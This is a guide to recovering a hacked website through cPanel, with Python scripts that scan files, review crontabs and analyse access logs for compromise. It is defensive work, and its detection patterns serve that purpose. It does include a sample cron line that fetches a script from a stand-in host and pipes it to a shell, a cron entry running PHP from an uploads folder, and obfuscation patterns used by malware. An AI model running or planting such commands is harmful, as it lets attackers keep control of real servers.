Website hacking incidents can affect businesses, blogs, e-commerce stores, and organizational websites of any size. A compromised website may result in data loss, malware infections, search engine blacklisting, reduced visitor trust, and financial losses. Fortunately, cPanel provides website administrators with several tools that can help identify, isolate, and recover from a security breach.
This guide explains the process of recovering a hacked website in cPanel, from identifying the attack to restoring normal operations and strengthening security afterward.
Signs That Your Website Has Been Hacked
Before beginning recovery, confirm that the website has actually been compromised. Common indicators include:
- Unexpected redirects to unfamiliar websites
- Suspicious pop-ups appearing on pages
- New administrator accounts you did not create
- Modified website content
- Search engines displaying warnings about malware
- Unusual spikes in bandwidth usage
- Website files changing without authorization
- Hosting provider security alerts
- Website sending spam emails
Other signs may include slow website performance, unauthorized cron jobs, and unfamiliar files appearing in the public_html directory.
Immediate Actions After Discovering a Hack
The first few hours after discovering a compromise are critical.
1. Change All Passwords
Immediately update:
- cPanel password
- Hosting account password
- FTP accounts
- SSH accounts
- Website administrator accounts
- Database user passwords
- Email account passwords
Use strong passwords containing:
- Uppercase letters
- Lowercase letters
- Numbers
- Special characters
Avoid reusing passwords across multiple services.
2. Enable Maintenance Mode
If possible, place the website in maintenance mode to prevent visitors from accessing infected content while recovery is underway.
For WordPress websites, maintenance plugins can be used to temporarily disable public access.
3. Notify Your Hosting Provider
Many hosting providers have security teams that can:
- Identify malicious files
- Review server logs
- Assist with malware removal
- Provide backup restoration options
Contact support immediately and explain the nature of the compromise.
Creating a Backup Before Recovery
Before removing files, create a complete backup.
Using cPanel Backup Tool
Navigate to:
cPanel → Files → Backup
Create backups of:
- Home Directory
- Databases
- Email Forwarders
- Email Filters
Store these backups in a secure location. Even infected backups can be useful for forensic analysis later.
Identifying Malicious Files
Hackers often upload:
- Backdoors
- Shell scripts
- Spam scripts
- Cryptocurrency miners
- Redirect malware
Common Locations to Check
Review these directories carefully:
/public_html/
/tmp/
/uploads/
/wp-content/uploads/
/images/
/cache/
Look for:
- Randomly named PHP files
- Recently modified files
- Obfuscated code
- Files with unusual permissions
Examples of obfuscated code include:
eval(base64_decode())
gzinflate(base64_decode())
str_rot13()
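Such code patterns are frequently used to conceal malware. They also appear in some legitimate plugins and themes, so treat a match as a reason to inspect the file rather than as proof of infection.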
Using cPanel File Manager for Investigation
Open:
cPanel → File Manager
Sort files by:
- Modification Date
- Size
- File Type
Look for files modified around the time the compromise occurred.
Common suspicious file names include:
wp-vcd.php
shell.php
cmd.php
up.php
adminer.php
cache.php
However, attackers often use legitimate-looking names to avoid detection.
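Because file names alone are unreliable, the checks from the two sections above (PHP files in data directories, obfuscated code, unusual permissions, recent modification) can be scripted. The Python script below is an added example, not part of cPanel or of any scanner named in this guide; the extension list, the one-day cutoff and the sample tree are assumptions, and every finding is a lead for manual review.

```python
import os
import re
import tempfile
import time
from pathlib import Path

PATTERNS = {  # obfuscation constructs named in this guide
    "eval(base64_decode": re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I),
    "gzinflate(base64_decode": re.compile(rb"gzinflate\s*\(\s*base64_decode\s*\(", re.I),
    "str_rot13": re.compile(rb"str_rot13\s*\(", re.I),
}
DATA_DIRS = {"uploads", "images", "cache", "tmp"}  # should hold no PHP

def scan_tree(root, cutoff):
    """Return {relative path: [reasons]} for files that need manual review."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_symlink() or not path.is_file():
            continue  # only regular files are inspected
        st = path.stat()
        rel = path.relative_to(root)
        is_php = path.suffix.lower() in {".php", ".phtml", ".phar"}
        reasons = []
        if is_php and DATA_DIRS & set(rel.parts[:-1]):
            reasons.append("PHP in data directory")
        if st.st_mode & 0o002:  # "other" write bit, as set by 666 or 777
            reasons.append("world-writable")
        if st.st_mtime >= cutoff:
            reasons.append("modified since cutoff")
        body = path.read_bytes() if is_php else b""
        reasons += [f"contains {k}" for k, rx in PATTERNS.items() if rx.search(body)]
        if reasons:
            findings[rel.as_posix()] = reasons
    return findings

def demo():  # constructed sample tree; cutoff is one day ago
    root, now = tempfile.mkdtemp(), time.time()
    samples = {  # path: (body, mode, age in days); the payload is an inert placeholder
        "index.php": (b"<?php echo 'home';", 0o644, 30),
        "wp-content/uploads/x7f3.php": (b"<?php eval(base64_decode('UExBQ0VIT0xERVI='));", 0o644, 0),
        "wp-content/themes/a/functions.php": (b"<?php // theme", 0o666, 30),
    }
    for rel, (body, mode, age) in samples.items():
        path = Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(body)
        path.chmod(mode)
        os.utime(path, (now - age * 86400,) * 2)
    return scan_tree(root, now - 86400)
```

Run `scan_tree()` against an extracted copy of the backup, with the cutoff set shortly before the first sign of compromise.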
Scanning for Malware
Many hosting providers offer malware scanning tools within cPanel.
Examples include:
- ImunifyAV
- Imunify360
- ClamAV
- SiteLock
Run a complete scan of:
- Website files
- Databases
- Email accounts
Document all infected files before deleting them.
Restoring from a Clean Backup
If a recent clean backup exists, restoration is usually the fastest recovery method.
Restore Website Files
In cPanel:
Files → Backup → Restore Home Directory
Upload the clean backup and restore website files.
Restore Databases
Navigate to:
Files → Backup → Restore MySQL Databases
Restore the most recent clean database backup.
Ensure the backup was created before the compromise occurred.
Cleaning a WordPress Website
WordPress is one of the most frequently targeted platforms.
Reinstall Core Files
Download a fresh copy of WordPress from the official source.
Replace:
/wp-admin/
/wp-includes/
Do not overwrite the following without first verifying their contents:
wp-config.php
wp-content
Remove Unused Plugins and Themes
Delete:
- Inactive plugins
- Unused themes
- Outdated extensions
These components are often exploited by attackers.
Update Everything
Update:
- WordPress core
- Plugins
- Themes
Security patches frequently address known vulnerabilities.
Checking the Database
Attackers sometimes inject malicious code directly into the database.
Open:
cPanel → phpMyAdmin
Review:
- wp_options
- wp_posts
- wp_users
Look for:
- Suspicious administrator accounts
- Hidden redirects
- Embedded malicious JavaScript
- Unauthorized settings changes
Delete unauthorized entries carefully.
Reviewing Website Permissions
Incorrect file permissions can make hacking easier.
Recommended permissions include:
| Item | Permission |
|---|---|
| Files | 644 |
| Directories | 755 |
| wp-config.php | 600 or 640 |
Avoid 777 permissions whenever possible.
Reviewing Cron Jobs
Attackers sometimes create automated tasks that reinstall malware after removal.
Navigate to:
cPanel → Advanced → Cron Jobs
Check for:
- Unfamiliar commands
- Suspicious URLs
- Encoded scripts
Remove any unauthorized entries.
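The three checks above can be applied to an exported crontab (for example the output of `crontab -l`) before anything is deleted. This Python script is an added example, not a cPanel feature; the rule set and the sample crontab, including its paths and the `example.invalid` URL, are constructed for illustration.

```python
import re

CHECKS = {  # reason -> pattern applied to the command part of an entry
    "fetches a remote URL": re.compile(r"\b(wget|curl|fetch|lynx)\b.*https?://", re.I),
    "pipes into an interpreter": re.compile(r"\|\s*(sh|bash|php|perl|python\d?)\b"),
    "decodes base64": re.compile(r"base64(\s+(-d|--decode)|_decode)", re.I),
    "runs from a temp or upload directory": re.compile(r"/(tmp|uploads|cache)/"),
}

def review_crontab(text):
    """Return [(line number, command, [reasons])] for entries needing review."""
    flagged = []
    for number, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"[A-Za-z_]+\s*=", line):
            continue  # blank line, comment, or environment assignment
        # "@reboot cmd" has one schedule field, a normal entry has five.
        fields = line.split(None, 1 if line.startswith("@") else 5)
        command = fields[-1]
        reasons = [why for why, rx in CHECKS.items() if rx.search(command)]
        if reasons:
            flagged.append((number, command, reasons))
    return flagged

# Constructed sample crontab.
SAMPLE_CRONTAB = """\
MAILTO=admin@example.com
# nightly WordPress cron
0 3 * * * /usr/local/bin/php /home/user/public_html/wp-cron.php
*/10 * * * * wget -q -O - http://example.invalid/u.txt | sh
@reboot /usr/local/bin/php /home/user/public_html/wp-content/uploads/cache.php
"""

if __name__ == "__main__":
    for number, command, reasons in review_crontab(SAMPLE_CRONTAB):
        print(f"line {number}: {command}\n    -> {', '.join(reasons)}")
```

Any file a flagged entry points to should be added to the list of infected files before the entry is removed.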
Reviewing Email Accounts
Compromised hosting accounts are often used to send spam.
Check:
cPanel → Email Accounts
Look for:
- Unauthorized accounts
- Unknown forwarders
- Spam activity
Delete suspicious accounts immediately.
Checking Access Logs
Access logs help determine how attackers entered the system.
In cPanel, review:
Metrics → Raw Access
Look for:
- Repeated login attempts
- Access from unfamiliar IP addresses
- Requests targeting vulnerable scripts
- File upload activity
Understanding the entry point helps prevent future attacks.
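As an added example (not part of the original guide or of cPanel), the following Python script applies two of these checks to a downloaded raw access log: repeated login POSTs per IP address, and successful requests to PHP scripts inside data directories. It assumes the Apache combined log format; the login paths, the threshold of five and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import Counter

# Leading fields of the Apache combined log format.
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")
SCRIPT_IN_DATA_DIR = re.compile(r"/(uploads|images|cache|tmp)/[^?]*\.php(\?|$)", re.I)

def analyse(lines, login_threshold=5):
    """Return ({ip: login POST count}, [(time, ip, method, path)] script hits)."""
    logins, script_hits = Counter(), []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip malformed lines rather than guessing
        path = m["path"].split("?", 1)[0]
        if m["method"] == "POST" and path in LOGIN_PATHS:
            logins[m["ip"]] += 1
        # A 200 response means the script exists and ran.
        if SCRIPT_IN_DATA_DIR.search(m["path"]) and m["status"] == "200":
            script_hits.append((m["ts"], m["ip"], m["method"], m["path"]))
    noisy = {ip: n for ip, n in logins.items() if n >= login_threshold}
    return noisy, script_hits

# Constructed sample lines using documentation-only IP ranges.
SAMPLE_LOG = [
    f'203.0.113.7 - - [12/Mar/2024:10:15:{s:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 4521 "-" "-"'
    for s in range(6)
] + [
    '192.0.2.10 - - [12/Mar/2024:10:16:02 +0000] "GET / HTTP/1.1" 200 8120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [12/Mar/2024:10:17:40 +0000] "POST /wp-content/uploads/2024/03/x7f3.php HTTP/1.1" 200 17 "-" "-"',
    '198.51.100.23 - - [12/Mar/2024:10:17:41 +0000] "GET /wp-content/uploads/2024/03/photo.jpg HTTP/1.1" 200 90210 "-" "-"',
]

if __name__ == "__main__":
    noisy, hits = analyse(SAMPLE_LOG)
    print("repeated login attempts:", noisy)
    for hit in hits:
        print("script in data directory:", *hit)
```

The earliest script hit gives a time window for the File Manager review, and the requests from the same IP address just before it usually point to the entry point.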
Removing Search Engine Warnings
After cleanup, search engines may continue displaying warnings.
Google Search Console
Use Google Search Console to:
- Verify website ownership
- Review security issues
- Request a security review
Google will rescan the site and remove warnings once the threat is eliminated.
Strengthening Website Security After Recovery
Recovery should always be followed by security improvements.
Enable Two-Factor Authentication
Many hosting providers support:
cPanel → Security → Two-Factor Authentication
This significantly reduces account takeover risks.
Install a Web Application Firewall
A firewall can block:
- SQL injection attacks
- Cross-site scripting attempts
- Brute-force login attacks
Limit Login Attempts
Protect administrator panels against password guessing attacks.
Disable Unused Services
Remove:
- Unused plugins
- Old applications
- Test installations
- Legacy scripts
Reducing the attack surface improves security.
Schedule Automated Backups
Implement:
- Daily backups for active websites
- Weekly full backups
- Offsite backup storage
Reliable backups can reduce recovery time from days to minutes.
Preventing Future Website Hacks
The best defense is a proactive security strategy.
Key practices include:
- Keep software updated.
- Use strong passwords.
- Enable two-factor authentication.
- Perform regular malware scans.
- Monitor website logs.
- Restrict file permissions.
- Remove unused applications.
- Maintain secure backups.
- Use SSL certificates.
- Monitor administrator accounts.
Organizations that regularly update software, review security logs, and maintain verified backups are far less likely to experience prolonged downtime after a security incident.
Recovering a hacked website in cPanel requires a structured approach: isolate the threat, preserve evidence, identify malicious files, restore clean data, secure user accounts, and strengthen defenses. While the recovery process may appear complex, following a systematic procedure can restore website functionality and significantly reduce the risk of future compromises.